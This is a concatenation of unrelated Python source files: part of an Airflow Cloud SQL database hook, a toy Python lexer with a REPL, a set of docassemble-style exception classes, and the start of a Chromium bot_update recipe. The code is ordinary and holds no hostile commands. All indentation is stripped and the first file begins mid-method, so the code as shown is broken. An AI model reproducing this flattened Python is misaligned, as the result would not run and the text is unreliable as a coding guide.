command_to_run.extend(self._get_credential_parameters())
self.log.info("Running the command: `%s`", " ".join(command_to_run))
self.sql_proxy_process = Popen(command_to_run, stdin=PIPE, stdout=PIPE, stderr=PIPE)
self.log.info("The pid of cloud_sql_proxy: %s", self.sql_proxy_process.pid)
while True:
line = (
self.sql_proxy_process.stderr.readline().decode('utf-8')
if self.sql_proxy_process.stderr
else ""
)
return_code = self.sql_proxy_process.poll()
if line == '' and return_code is not None:
self.sql_proxy_process = None
raise AirflowException(
f"The cloud_sql_proxy finished early with return code {return_code}!"
)
if line != '':
self.log.info(line)
if "googleapi: Error" in line or "invalid instance name:" in line:
self.stop_proxy()
raise AirflowException(f"Error when starting the cloud_sql_proxy {line}!")
if "Ready for new connections" in line:
return
def stop_proxy(self) -> None:
"""
Stops running proxy.
You should stop the proxy after you stop using it.
"""
if not self.sql_proxy_process:
raise AirflowException("The sql proxy is not started yet")
else:
self.log.info("Stopping the cloud_sql_proxy pid: %s", self.sql_proxy_process.pid)
self.sql_proxy_process.kill()
self.sql_proxy_process = None
# Cleanup!
self.log.info("Removing the socket directory: %s", self.cloud_sql_proxy_socket_directory)
shutil.rmtree(self.cloud_sql_proxy_socket_directory, ignore_errors=True)
if self.sql_proxy_was_downloaded:
self.log.info("Removing downloaded proxy: %s", self.sql_proxy_path)
# Silently ignore if the file has already been removed (concurrency)
try:
os.remove(self.sql_proxy_path)
except OSError as e:
if e.errno != errno.ENOENT:
raise
else:
self.log.info("Skipped removing proxy - it was not downloaded: %s", self.sql_proxy_path)
if os.path.isfile(self.credentials_path):
self.log.info("Removing generated credentials file %s", self.credentials_path)
# Here file cannot be delete by concurrent task (each task has its own copy)
os.remove(self.credentials_path)
def get_proxy_version(self) -> Optional[str]:
"""Returns version of the Cloud SQL Proxy."""
self._download_sql_proxy_if_needed()
command_to_run = [self.sql_proxy_path]
command_to_run.extend(['--version'])
command_to_run.extend(self._get_credential_parameters())
result = subprocess.check_output(command_to_run).decode('utf-8')
pattern = re.compile("^.*[V|v]ersion ([^;]*);.*$")
matched = pattern.match(result)
if matched:
return matched.group(1)
else:
return None
def get_socket_path(self) -> str:
"""
Retrieves UNIX socket path used by Cloud SQL Proxy.
:return: The dynamically generated path for the socket created by the proxy.
:rtype: str
"""
return self.cloud_sql_proxy_socket_directory + "/" + self.instance_specification
CONNECTION_URIS = {
"postgres": {
"proxy": {
"tcp": "postgresql://{user}:{password}@127.0.0.1:{proxy_port}/{database}",
"socket": "postgresql://{user}:{password}@{socket_path}/{database}",
},
"public": {
"ssl": "postgresql://{user}:{password}@{public_ip}:{public_port}/{database}?"
"sslmode=verify-ca&"
"sslcert={client_cert_file}&"
"sslkey={client_key_file}&"
"sslrootcert={server_ca_file}",
"non-ssl": "postgresql://{user}:{password}@{public_ip}:{public_port}/{database}",
},
},
"mysql": {
"proxy": {
"tcp": "mysql://{user}:{password}@127.0.0.1:{proxy_port}/{database}",
"socket": "mysql://{user}:{password}@localhost/{database}?unix_socket={socket_path}",
},
"public": {
"ssl": "mysql://{user}:{password}@{public_ip}:{public_port}/{database}?ssl={ssl_spec}",
"non-ssl": "mysql://{user}:{password}@{public_ip}:{public_port}/{database}",
},
},
} # type: Dict[str, Dict[str, Dict[str, str]]]
CLOUD_SQL_VALID_DATABASE_TYPES = ['postgres', 'mysql']
class CloudSQLDatabaseHook(BaseHook):
"""Serves DB connection configuration for Google Cloud SQL (Connections
of *gcpcloudsqldb://* type).
The hook is a "meta" one. It does not perform an actual connection.
It is there to retrieve all the parameters configured in gcpcloudsql:// connection,
start/stop Cloud SQL Proxy if needed, dynamically generate Postgres or MySQL
connection in the database and return an actual Postgres or MySQL hook.
The returned Postgres/MySQL hooks are using direct connection or Cloud SQL
Proxy socket/TCP as configured.
Main parameters of the hook are retrieved from the standard URI components:
* **user** - User name to authenticate to the database (from login of the URI).
* **password** - Password to authenticate to the database (from password of the URI).
* **public_ip** - IP to connect to for public connection (from host of the URI).
* **public_port** - Port to connect to for public connection (from port of the URI).
* **database** - Database to connect to (from schema of the URI).
Remaining parameters are retrieved from the extras (URI query parameters):
* **project_id** - Optional, Google Cloud project where the Cloud SQL
instance exists. If missing, default project id passed is used.
* **instance** - Name of the instance of the Cloud SQL database instance.
* **location** - The location of the Cloud SQL instance (for example europe-west1).
* **database_type** - The type of the database instance (MySQL or Postgres).
* **use_proxy** - (default False) Whether SQL proxy should be used to connect to Cloud
SQL DB.
* **use_ssl** - (default False) Whether SSL should be used to connect to Cloud SQL DB.
You cannot use proxy and SSL together.
* **sql_proxy_use_tcp** - (default False) If set to true, TCP is used to connect via
proxy, otherwise UNIX sockets are used.
* **sql_proxy_binary_path** - Optional path to Cloud SQL Proxy binary. If the binary
is not specified or the binary is not present, it is automatically downloaded.
* **sql_proxy_version** - Specific version of the proxy to download (for example
v1.13). If not specified, the latest version is downloaded.
* **sslcert** - Path to client certificate to authenticate when SSL is used.
* **sslkey** - Path to client private key to authenticate when SSL is used.
* **sslrootcert** - Path to server's certificate to authenticate when SSL is used.
:param gcp_cloudsql_conn_id: URL of the connection
:type gcp_cloudsql_conn_id: str
:param gcp_conn_id: The connection ID used to connect to Google Cloud for
cloud-sql-proxy authentication.
:type gcp_conn_id: str
:param default_gcp_project_id: Default project id used if project_id not specified
in the connection URL
:type default_gcp_project_id: str
"""
conn_name_attr = 'gcp_cloudsql_conn_id'
default_conn_name = 'google_cloud_sql_default'
conn_type = 'gcpcloudsqldb'
hook_name = 'Google Cloud SQL Database'
_conn = None # type: Optional[Any]
def __init__(
self,
gcp_cloudsql_conn_id: str = 'google_cloud_sql_default',
gcp_conn_id: str = 'google_cloud_default',
default_gcp_project_id: Optional[str] = None,
) -> None:
super().__init__()
self.gcp_conn_id = gcp_conn_id
self.gcp_cloudsql_conn_id = gcp_cloudsql_conn_id
self.cloudsql_connection = self.get_connection(self.gcp_cloudsql_conn_id)
self.extras = self.cloudsql_connection.extra_dejson
self.project_id = self.extras.get('project_id', default_gcp_project_id) # type: Optional[str]
self.instance = self.extras.get('instance') # type: Optional[str]
self.database = self.cloudsql_connection.schema # type: Optional[str]
self.location = self.extras.get('location') # type: Optional[str]
self.database_type = self.extras.get('database_type') # type: Optional[str]
self.use_proxy = self._get_bool(self.extras.get('use_proxy', 'False')) # type: bool
self.use_ssl = self._get_bool(self.extras.get('use_ssl', 'False')) # type: bool
self.sql_proxy_use_tcp = self._get_bool(self.extras.get('sql_proxy_use_tcp', 'False')) # type: bool
self.sql_proxy_version = self.extras.get('sql_proxy_version') # type: Optional[str]
self.sql_proxy_binary_path = self.extras.get('sql_proxy_binary_path') # type: Optional[str]
self.user = self.cloudsql_connection.login # type: Optional[str]
self.password = self.cloudsql_connection.password # type: Optional[str]
self.public_ip = self.cloudsql_connection.host # type: Optional[str]
self.public_port = self.cloudsql_connection.port # type: Optional[int]
self.sslcert = self.extras.get('sslcert') # type: Optional[str]
self.sslkey = self.extras.get('sslkey') # type: Optional[str]
self.sslrootcert = self.extras.get('sslrootcert') # type: Optional[str]
# Port and socket path and db_hook are automatically generated
self.sql_proxy_tcp_port = None
self.sql_proxy_unique_path = None # type: Optional[str]
self.db_hook = None # type: Optional[Union[PostgresHook, MySqlHook]]
self.reserved_tcp_socket = None # type: Optional[socket.socket]
# Generated based on clock + clock sequence. Unique per host (!).
# This is important as different hosts share the database
self.db_conn_id = str(uuid.uuid1())
self._validate_inputs()
@staticmethod
def _get_bool(val: Any) -> bool:
if val == 'False':
return False
return True
@staticmethod
def _check_ssl_file(file_to_check, name) -> None:
if not file_to_check:
raise AirflowException(f"SSL connections requires {name} to be set")
if not os.path.isfile(file_to_check):
raise AirflowException(f"The {file_to_check} must be a readable file")
def _validate_inputs(self) -> None:
if self.project_id == '':
raise AirflowException("The required extra 'project_id' is empty")
if not self.location:
raise AirflowException("The required extra 'location' is empty or None")
if not self.instance:
raise AirflowException("The required extra 'instance' is empty or None")
if self.database_type not in CLOUD_SQL_VALID_DATABASE_TYPES:
raise AirflowException(
"Invalid database type '{}'. Must be one of {}".format(
self.database_type, CLOUD_SQL_VALID_DATABASE_TYPES
)
)
if self.use_proxy and self.use_ssl:
raise AirflowException(
"Cloud SQL Proxy does not support SSL connections."
" SSL is not needed as Cloud SQL Proxy "
"provides encryption on its own"
)
def validate_ssl_certs(self) -> None:
"""
SSL certificates validator.
:return: None
"""
if self.use_ssl:
self._check_ssl_file(self.sslcert, "sslcert")
self._check_ssl_file(self.sslkey, "sslkey")
self._check_ssl_file(self.sslrootcert, "sslrootcert")
def validate_socket_path_length(self) -> None:
"""
Validates sockets path length.
:return: None or rises AirflowException
"""
if self.use_proxy and not self.sql_proxy_use_tcp:
if self.database_type == 'postgres':
suffix = "/.s.PGSQL.5432"
else:
suffix = ""
expected_path = "{}/{}:{}:{}{}".format(
self._generate_unique_path(), self.project_id, self.instance, self.database, suffix
)
if len(expected_path) > UNIX_PATH_MAX:
self.log.info("Too long (%s) path: %s", len(expected_path), expected_path)
raise AirflowException(
"The UNIX socket path length cannot exceed {} characters "
"on Linux system. Either use shorter instance/database "
"name or switch to TCP connection. "
"The socket path for Cloud SQL proxy is now:"
"{}".format(UNIX_PATH_MAX, expected_path)
)
@staticmethod
def _generate_unique_path() -> str:
"""
We are not using mkdtemp here as the path generated with mkdtemp
can be close to 60 characters and there is a limitation in
length of socket path to around 100 characters in total.
We append project/location/instance to it later and postgres
appends its own prefix, so we chose a shorter "/tmp/[8 random characters]"
"""
random.seed()
while True:
candidate = "/tmp/" + ''.join(
random.choice(string.ascii_lowercase + string.digits) for _ in range(8)
)
if not os.path.exists(candidate):
return candidate
@staticmethod
def _quote(value) -> Optional[str]:
return quote_plus(value) if value else None
def _generate_connection_uri(self) -> str:
if self.use_proxy:
if self.sql_proxy_use_tcp:
if not self.sql_proxy_tcp_port:
self.reserve_free_tcp_port()
if not self.sql_proxy_unique_path:
self.sql_proxy_unique_path = self._generate_unique_path()
if not self.database_type:
raise ValueError("The database_type should be set")
database_uris = CONNECTION_URIS[self.database_type] # type: Dict[str, Dict[str, str]]
ssl_spec = None
socket_path = None
if self.use_proxy:
proxy_uris = database_uris['proxy'] # type: Dict[str, str]
if self.sql_proxy_use_tcp:
format_string = proxy_uris['tcp']
else:
format_string = proxy_uris['socket']
socket_path = "{sql_proxy_socket_path}/{instance_socket_name}".format(
sql_proxy_socket_path=self.sql_proxy_unique_path,
instance_socket_name=self._get_instance_socket_name(),
)
else:
public_uris = database_uris['public'] # type: Dict[str, str]
if self.use_ssl:
format_string = public_uris['ssl']
ssl_spec = {'cert': self.sslcert, 'key': self.sslkey, 'ca': self.sslrootcert}
else:
format_string = public_uris['non-ssl']
if not self.user:
raise AirflowException("The login parameter needs to be set in connection")
if not self.public_ip:
raise AirflowException("The location parameter needs to be set in connection")
if not self.password:
raise AirflowException("The password parameter needs to be set in connection")
if not self.database:
raise AirflowException("The database parameter needs to be set in connection")
connection_uri = format_string.format(
user=quote_plus(self.user) if self.user else '',
password=quote_plus(self.password) if self.password else '',
database=quote_plus(self.database) if self.database else '',
public_ip=self.public_ip,
public_port=self.public_port,
proxy_port=self.sql_proxy_tcp_port,
socket_path=self._quote(socket_path),
ssl_spec=self._quote(json.dumps(ssl_spec)) if ssl_spec else '',
client_cert_file=self._quote(self.sslcert) if self.sslcert else '',
client_key_file=self._quote(self.sslkey) if self.sslcert else '',
server_ca_file=self._quote(self.sslrootcert if self.sslcert else ''),
)
self.log.info(
"DB connection URI %s",
connection_uri.replace(
quote_plus(self.password) if self.password else 'PASSWORD', 'XXXXXXXXXXXX'
),
)
return connection_uri
def _get_instance_socket_name(self) -> str:
return self.project_id + ":" + self.location + ":" + self.instance # type: ignore
def _get_sqlproxy_instance_specification(self) -> str:
instance_specification = self._get_instance_socket_name()
if self.sql_proxy_use_tcp:
instance_specification += "=tcp:" + str(self.sql_proxy_tcp_port)
return instance_specification
def create_connection(self) -> Connection:
"""
Create Connection object, according to whether it uses proxy, TCP, UNIX sockets, SSL.
Connection ID will be randomly generated.
"""
uri = self._generate_connection_uri()
connection = Connection(conn_id=self.db_conn_id, uri=uri)
self.log.info("Creating connection %s", self.db_conn_id)
return connection
def get_sqlproxy_runner(self) -> CloudSqlProxyRunner:
"""
Retrieve Cloud SQL Proxy runner. It is used to manage the proxy
lifecycle per task.
:return: The Cloud SQL Proxy runner.
:rtype: CloudSqlProxyRunner
"""
if not self.use_proxy:
raise ValueError("Proxy runner can only be retrieved in case of use_proxy = True")
if not self.sql_proxy_unique_path:
raise ValueError("The sql_proxy_unique_path should be set")
return CloudSqlProxyRunner(
path_prefix=self.sql_proxy_unique_path,
instance_specification=self._get_sqlproxy_instance_specification(),
project_id=self.project_id,
sql_proxy_version=self.sql_proxy_version,
sql_proxy_binary_path=self.sql_proxy_binary_path,
gcp_conn_id=self.gcp_conn_id,
)
def get_database_hook(self, connection: Connection) -> Union[PostgresHook, MySqlHook]:
"""
Retrieve database hook. This is the actual Postgres or MySQL database hook
that uses proxy or connects directly to the Google Cloud SQL database.
"""
if self.database_type == 'postgres':
self.db_hook = PostgresHook(connection=connection, schema=self.database)
else:
self.db_hook = MySqlHook(connection=connection, schema=self.database)
return self.db_hook
def cleanup_database_hook(self) -> None:
"""Clean up database hook after it was used."""
if self.database_type == 'postgres':
if not self.db_hook:
raise ValueError("The db_hook should be set")
if not isinstance(self.db_hook, PostgresHook):
raise ValueError(f"The db_hook should be PostgresHook and is {type(self.db_hook)}")
conn = getattr(self.db_hook, 'conn')
if conn and conn.notices:
for output in self.db_hook.conn.notices:
self.log.info(output)
def reserve_free_tcp_port(self) -> None:
"""Reserve free TCP port to be used by Cloud SQL Proxy"""
self.reserved_tcp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.reserved_tcp_socket.bind(('127.0.0.1', 0))
self.sql_proxy_tcp_port = self.reserved_tcp_socket.getsockname()[1]
def free_reserved_port(self) -> None:
"""Free TCP port. Makes it immediately ready to be used by Cloud SQL Proxy."""
if self.reserved_tcp_socket:
self.reserved_tcp_socket.close()
self.reserved_tcp_socket = None
|
|
#!/usr/bin/env python
"""
a work in progress toy python interpreter
"""
# python 2/3 compatibility
from __future__ import (
absolute_import,
division,
print_function,
unicode_literals
)
import sys
if sys.version_info < (3, 0):
input = raw_input # pylint: disable=redefined-builtin,invalid-name
class Token(object): # pylint: disable=too-few-public-methods
""" basic token, holds identifier along with human readable strings """
def __init__(self, ident, string=None, value=None):
self.ident = ident
if string is None:
self.string = str(self.ident)
else:
self.string = string
self.value = value
def __repr__(self):
if self.value is None:
return '<' + str(self.string) + '>'
else:
return '<' + str(self.string) + ', ' + str(self.value) + '>'
def with_value(self, value):
""" return a new token like self but with a specific value """
new_token = Token(self.ident, self.string)
new_token.value = value
return new_token
class Lexer(object):
""" convert input line into a stream of tokens """
# tokens
nothing = Token(0)
error = Token(1)
error_indentation = Token(error.ident, 'IndentationError')
error_syntax = Token(error.ident, 'SyntaxError', 'invalid syntax')
newline = Token(100, 'newline')
indent = Token(101, 'indent')
dedent = Token(102, 'dedent')
# identifiers
identifier = Token(200, 'identifier')
# keywords
keyword = Token(300, 'keyword')
keywords = ['False', 'None', 'True', 'and', 'as', 'assert', 'break',
'class', 'continue', 'def', 'del', 'elif', 'else', 'except',
'finally', 'for', 'from', 'global', 'if', 'import', 'in',
'is', 'lambda', 'nonlocal', 'not', 'or', 'pass', 'raise',
'return', 'try', 'while', 'with', 'yield']
# literals
literal_string = Token(400, 'literal_string')
literal_integer = Token(401, 'literal_integer')
literal_float = Token(402, 'literal_float')
# operators
operator = Token(500, 'operator')
operators = ['+', '-', '*', '**', '/', '//', '%', '<<', '>>', '&', '|',
'^', '~', '<', '>', '<=', '>=', '==', '!=']
# delimiters
delimiter = Token(600, 'delimiter')
delimiters = ['(', ')', '[', ']', '{', '}', ',', ':', '.', ';', '=', '@']
def __init__(self):
self.state = None
self.indent = None
self.parens = None
self.line = None
self.continuation = None
self._reset()
def _reset(self):
""" reset full lexer state """
self.state = self.state_indent
self.indent = [0]
self.parens = 0
self.line = ''
self.continuation = False
def _peek(self, count):
"""
get a list of length count with either character values or None
do not modify current data
"""
if len(self.line) >= count:
return self.line[:count]
return [None] * count
def _pop(self, count):
"""
get a list of length count with either character values or None
update current data by removing count values
"""
if len(self.line) >= count:
res = self._peek(count)
self.line = self.line[count:]
return res
return [None] * count
def lex(self, line):
""" add another line to be lexed and run current state """
# only add line if we are in a continuation or line is not empty
if self.continuation is True or line.strip() != '':
self.line += line
self.continuation = False
# keep running states until out of data or we need a continuation
while self.continuation is False and len(self.line) > 0:
for token in self.state():
if token.ident == Lexer.error.ident:
yield token
# reset state on error
self._reset()
return
yield token
def state_indent(self):
""" starting lex state for a new, non-continued line """
# get indent level
indent = 0
while self._peek(1) == ' ' or self._peek(1) == '\t':
indent += 1
self._pop(1)
# if new indent is larger, push it and generate indent token
if indent > self.indent[0]:
self.indent.insert(0, indent)
yield Lexer.indent
# if new indent is smaller, pop off the stack till we match
while indent < self.indent[0]:
self.indent = self.indent[1:]
yield Lexer.dedent
# make sure the new indent level matches a previous level
if self.indent[0] != indent:
yield Lexer.error_indentation.with_value(
'unindent does not match any outer indentation level')
return
self.state = self.state_whitespace
def state_whitespace(self):
""" consume all whitespace, but don't generate tokens """
while self._peek(1) == ' ' or self._peek(1) == '\t':
self._pop(1)
self.state = self.state_newline
return [] # fake generator
def state_newline(self):
""" lex a newline, if found then go to starting state """
if self._peek(1) == '\n':
self._pop(1)
if self.parens == 0:
# only generate newline if we are not in a paren block
yield Lexer.newline
# go to starting state
self.state = self.state_indent
else:
# we are in a paren block
self.state = self.state_whitespace
else:
self.state = self.state_comment
def state_comment(self):
""" discard comments, turns into a newline and go to starting state"""
if self._peek(1) == '#':
# consume through the newline
while self._pop(1) != '\n':
pass
yield Lexer.newline
# go to starting state
self.state = self.state_indent
else:
self.state = self.state_line_continuation
def state_line_continuation(self):
""" backslash means we need another line """
if self._peek(2) == '\\\n':
self._pop(2)
self.continuation = True
self.state = self.state_whitespace
else:
self.state = self.state_identifier
return [] # fake generator
def state_identifier(self):
""" either an identifier or a keyword """
if self._peek(1) in 'abcdefghijklmnopqrstuvwxyz' \
'ABCDEFGHIJKLMNOPQRSTUVWXYZ_':
identifier = ''
while self._peek(1) in 'abcdefghijklmnopqrstuvwxyz' \
'ABCDEFGHIJKLMNOPQRSTUVWXYZ_0123456789':
identifier += self._pop(1)
if identifier in Lexer.keywords:
yield Lexer.keyword.with_value(identifier)
else:
yield Lexer.identifier.with_value(identifier)
self.state = self.state_whitespace
else:
self.state = self.state_number
def state_number(self):
""" integer or float literal """
if (self._peek(2)[0] == '.' and self._peek(2)[1] in '0123456789') or \
self._peek(1) in '0123456789':
number = ''
token = Lexer.literal_integer
while self._peek(1) in '0123456789.':
char = self._pop(1)
number += char
if token.ident == Lexer.literal_integer.ident and \
char == '.':
token = Lexer.literal_float
elif char == '.':
yield Lexer.error_syntax
return
yield token.with_value(number)
self.state = self.state_whitespace
else:
self.state = self.state_string
def state_string(self):
""" long and short strings """
quote = None
if self._peek(3) == '\'\'\'' or self._peek(3) == '"""':
quote = self._pop(3)
elif self._peek(1) == '\'' or self._peek(1) == '"':
quote = self._pop(1)
else:
self.state = self.state_operator
return
string = ''
while self._peek(len(quote)) != quote:
char = self._pop(1)
# handle escape sequences
if char == '\\':
char = self._peek(1)
if char == '\\':
char = self._pop(1)
elif char == '\'':
char = self._pop(1)
elif char == '"':
char = self._pop(1)
elif char == 't':
char = '\t'
self._pop(1)
string += char
if char == '\n' and len(quote) == 1:
yield Lexer.error_syntax.with_value(
'EOL while scanning string literal')
return
elif char == '\n' and len(self.line) == 0:
# multi-line triple quote string, so reset and get more lines
# NOTE: this seems a bit clumsy
self.line = quote + string
self.continuation = True
return
self._pop(len(quote))
yield Lexer.literal_string.with_value(string)
self.state = self.state_whitespace
def state_operator(self):
""" binary and unary operators """
if self._peek(2) in Lexer.operators:
yield Lexer.operator.with_value(self._pop(2))
self.state = self.state_whitespace
elif self._peek(1) in Lexer.operators:
yield Lexer.operator.with_value(self._pop(1))
self.state = self.state_whitespace
else:
self.state = self.state_delimiter
def state_delimiter(self):
""" lexer delimiters, some may be syntax operators """
if self._peek(1) in Lexer.delimiters:
if self._peek(1) == '(':
self.parens += 1
elif self._peek(1) == ')':
self.parens -= 1
yield Lexer.delimiter.with_value(self._pop(1))
if self.parens < 0:
yield Lexer.error_syntax
self.state = self.state_whitespace
else:
self.state = self.state_whitespace # no more states
class Parser(object): # pylint: disable=too-few-public-methods
""" lex and evaluate input lines """
def __init__(self):
self.lexer = Lexer()
def parse(self, line):
""" parse tokens line by line """
for token in self.lexer.lex(line):
if token.ident == Lexer.error.ident:
# if the lexer found an error, print it
print("Traceback\n " + line)
print(token)
return ''
print(repr(token), end=' ')
print()
# if we need another line, return None
if self.lexer.continuation is True or self.lexer.parens > 0:
return None
return ''
def use_repl():
""" interactive input """
parser = Parser()
prompt = '>'
result = ''
while True:
print(prompt, end=' ')
try:
result = parser.parse(input() + '\n')
if result is not None:
if result != '':
print(result)
prompt = '>'
else:
prompt = '.'
except EOFError:
print()
break
def use_file(filename):
""" read from a file """
parser = Parser()
with open(filename) as pyfile:
for line in pyfile:
parser.parse(line)
if __name__ == '__main__':
if len(sys.argv) == 1:
use_repl()
else:
use_file(sys.argv[1])
|
|
import re
valid_variable_match = re.compile(r'^[^\d][A-Za-z0-9\_]*$')
class DAIndexError(IndexError):
pass
class DAAttributeError(AttributeError):
pass
class DAError(Exception):
def __init__(self, value, code=501):
self.value = value
self.error_code = code
super().__init__(value)
def __str__(self):
return str(self.value)
class DANotFoundError(Exception):
pass
class DAValidationError(Exception):
"""This is an Exception object that is used when raising an exception inside input validation code."""
def __init__(self, *pargs, field=None):
self.field = field
super().__init__(*pargs)
class CodeExecute(Exception):
def __init__(self, compute, question):
if isinstance(compute, list):
self.compute = "\n".join(compute)
else:
self.compute = compute
self.question = question
super().__init__()
class ForcedReRun(Exception):
pass
class LazyNameError(NameError):
pass
def invalid_variable_name(varname):
if not isinstance(varname, str):
return True
if re.search(r'[\n\r\(\)\{\}\*\^\#]', varname):
return True
varname = re.sub(r'[\.\[].*', '', varname)
if not valid_variable_match.match(varname):
return True
return False
class ForcedNameError(NameError):
def __init__(self, *pargs, **kwargs):
the_args = list(pargs)
if len(the_args) == 0:
raise DAError("ForcedNameError must have at least one argument")
the_context = {}
the_user_dict = kwargs.get('user_dict', {})
for var_name in ('x', 'i', 'j', 'k', 'l', 'm', 'n'):
if var_name in the_user_dict:
the_context[var_name] = the_user_dict[var_name]
first_is_plain = bool(isinstance(the_args[0], str))
self.next_action = []
while len(the_args) > 0:
arg = the_args.pop(0)
if isinstance(arg, dict):
if (len(arg.keys()) == 2 and 'action' in arg and 'arguments' in arg) or (len(arg.keys()) == 1 and 'action' in arg):
arg['context'] = {}
self.set_action(arg)
elif len(arg) == 1 and ('undefine' in arg or 'invalidate' in arg or 'recompute' in arg or 'set' in arg or 'follow up' in arg):
if 'set' in arg:
if isinstance(arg['set'], dict):
arg['set'] = [arg['set']]
if not isinstance(arg['set'], list):
raise DAError("force_ask: the set statement must refer to a list.")
clean_list = []
for the_dict in arg['set']:
if not isinstance(the_dict, dict):
raise DAError("force_ask: a set command must refer to a list of dicts.")
for the_var, the_val in the_dict.items():
if not isinstance(the_var, str):
raise DAError("force_ask: a set command must refer to a list of dicts with keys as variable names. ")
the_var_stripped = the_var.strip()
if invalid_variable_name(the_var_stripped):
raise DAError("force_ask: missing or invalid variable name " + repr(the_var) + ".")
clean_list.append([the_var_stripped, the_val])
self.set_action(dict(action='_da_set', arguments=dict(variables=clean_list), context=the_context))
if 'follow up' in arg:
if isinstance(arg['follow up'], str):
arg['follow up'] = [arg['follow up']]
if not isinstance(arg['follow up'], list):
raise DAError("force_ask: the follow up statement must refer to a list.")
for var in arg['follow up']:
if not isinstance(var, str):
raise DAError("force_ask: invalid variable name " + repr(var) + " in follow up.")
var_saveas = var.strip()
if invalid_variable_name(var_saveas):
raise DAError("force_ask: missing or invalid variable name " + repr(var_saveas) + ".")
self.set_action(dict(action=var, arguments={}, context=the_context))
for command in ('undefine', 'invalidate', 'recompute'):
if command not in arg:
continue
if isinstance(arg[command], str):
arg[command] = [arg[command]]
if not isinstance(arg[command], list):
raise DAError("force_ask: the " + command + " statement must refer to a list. ")
clean_list = []
for undef_var in arg[command]:
if not isinstance(undef_var, str):
raise DAError("force_ask: invalid variable name " + repr(undef_var) + " in " + command + ".")
undef_saveas = undef_var.strip()
if invalid_variable_name(undef_saveas):
raise DAError("force_ask: missing or invalid variable name " + repr(undef_saveas) + ".")
clean_list.append(undef_saveas)
if command == 'invalidate':
self.set_action(dict(action='_da_invalidate', arguments=dict(variables=clean_list), context=the_context))
else:
self.set_action(dict(action='_da_undefine', arguments=dict(variables=clean_list), context=the_context))
if command == 'recompute':
self.set_action(dict(action='_da_compute', arguments=dict(variables=clean_list), context=the_context))
else:
raise DAError("Dictionaries passed to force_ask must have keys of 'action' and 'argument' only.")
else:
self.set_action(dict(action=arg, arguments={}, context=the_context))
if kwargs.get('gathering', False):
self.next_action = None
if first_is_plain:
self.arguments = None
super().__init__()
def set_action(self, data):
if not hasattr(self, 'name'):
if isinstance(data, dict) and 'action' in data and (len(data) == 1 or 'arguments' in data):
self.name = data['action']
self.arguments = data.get('arguments', {})
self.context = data.get('context', {})
else:
raise DAError("force_ask: invalid parameter " + repr(data))
self.next_action.append(data)
class DAErrorNoEndpoint(DAError):
pass
class DAErrorMissingVariable(DAError):
def __init__(self, value, variable=None, code=501):
self.value = value
self.variable = variable
self.error_code = code
super().__init__(value)
class DAErrorCompileError(DAError):
pass
class MandatoryQuestion(Exception):
def __init__(self):
self.value = 'Mandatory Question'
super().__init__()
def __str__(self):
return str(self.value)
class QuestionError(Exception):
def __init__(self, *pargs, **kwargs):
if len(pargs) >= 1:
self.question = pargs[0]
elif 'question' in kwargs:
self.question = kwargs['question']
else:
self.question = "Question not specified"
if len(pargs) >= 2:
self.subquestion = pargs[1]
elif 'subquestion' in kwargs:
self.subquestion = kwargs['subquestion']
else:
self.subquestion = None
if len(pargs) >= 3:
self.url = pargs[2]
elif 'url' in kwargs:
self.url = kwargs['url']
else:
self.url = None
if 'show_leave' in kwargs:
self.show_leave = kwargs['show_leave']
else:
self.show_leave = None
if 'show_exit' in kwargs:
self.show_exit = kwargs['show_exit']
else:
self.show_exit = None
if 'reload' in kwargs:
self.reload = kwargs['reload']
else:
self.reload = None
if 'show_restart' in kwargs:
self.show_restart = kwargs['show_restart']
else:
self.show_restart = None
if 'buttons' in kwargs:
self.buttons = kwargs['buttons']
else:
self.buttons = None
if 'dead_end' in kwargs:
self.dead_end = kwargs['dead_end']
else:
self.dead_end = None
super().__init__()
def __str__(self):
return str(self.question)
class BackgroundResponseError(Exception):
def __init__(self, *pargs, **kwargs):
if len(pargs) > 0 and len(kwargs) > 0:
self.backgroundresponse = dict(pargs=list(pargs), kwargs=kwargs)
elif len(pargs) > 1:
self.backgroundresponse = list(pargs)
elif len(pargs) == 1:
self.backgroundresponse = pargs[0]
else:
self.backgroundresponse = kwargs
if 'sleep' in kwargs:
self.sleep = kwargs['sleep']
super().__init__()
def __str__(self):
if hasattr(self, 'backgroundresponse'):
return str(self.backgroundresponse)
return "A BackgroundResponseError exception was thrown"
class BackgroundResponseActionError(Exception):
def __init__(self, *pargs, **kwargs):
self.action = dict(arguments={})
if len(pargs) == 0:
self.action['action'] = None
else:
self.action['action'] = pargs[0]
for key, val in kwargs.items():
self.action['arguments'][key] = val
super().__init__()
def __str__(self):
if hasattr(self, 'action'):
return str(self.action)
return "A BackgroundResponseActionError exception was thrown"
class ResponseError(Exception):
def __init__(self, *pargs, **kwargs):
if len(pargs) == 0 and not ('response' in kwargs or 'binaryresponse' in kwargs or 'all_variables' in kwargs or 'file' in kwargs or 'url' in kwargs or 'null' in kwargs):
self.response = "Empty Response"
if len(pargs) > 0:
self.response = pargs[0]
elif 'response' in kwargs:
self.response = kwargs['response']
elif 'binaryresponse' in kwargs:
self.binaryresponse = kwargs['binaryresponse']
elif 'file' in kwargs:
self.filename = kwargs['file']
elif 'url' in kwargs:
self.url = kwargs['url']
elif 'null' in kwargs:
self.nullresponse = kwargs['null']
if 'response_code' in kwargs and kwargs['response_code'] is not None:
self.response_code = kwargs['response_code']
if 'sleep' in kwargs:
self.sleep = kwargs['sleep']
if 'all_variables' in kwargs:
self.all_variables = kwargs['all_variables']
if 'include_internal' in kwargs:
self.include_internal = kwargs['include_internal']
if 'content_type' in kwargs:
self.content_type = kwargs['content_type']
super().__init__()
def __str__(self):
if hasattr(self, 'response'):
return str(self.response)
return "A ResponseError exception was thrown"
class CommandError(Exception):
def __init__(self, *pargs, **kwargs):
if len(pargs) > 0:
self.return_type = pargs[0]
elif 'type' in kwargs:
self.return_type = kwargs['type']
else:
self.return_type = "exit"
self.url = kwargs.get('url', '')
self.sleep = kwargs.get('sleep', None)
super().__init__()
def __str__(self):
return str(self.return_type)
class DAWebError(Exception):
def __init__(self, **kwargs):
for key, val in kwargs.items():
setattr(self, key, val)
super().__init__()
|
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Recipe module to ensure a checkout is consistent on a bot."""
from recipe_engine import recipe_api
from PB.go.chromium.org.luci.buildbucket.proto import common as common_pb2
class BotUpdateApi(recipe_api.RecipeApi):
def __init__(self, properties, deps_revision_overrides, fail_patch, *args,
**kwargs):
self._deps_revision_overrides = deps_revision_overrides
self._fail_patch = fail_patch
self._last_returned_properties = {}
super(BotUpdateApi, self).__init__(*args, **kwargs)
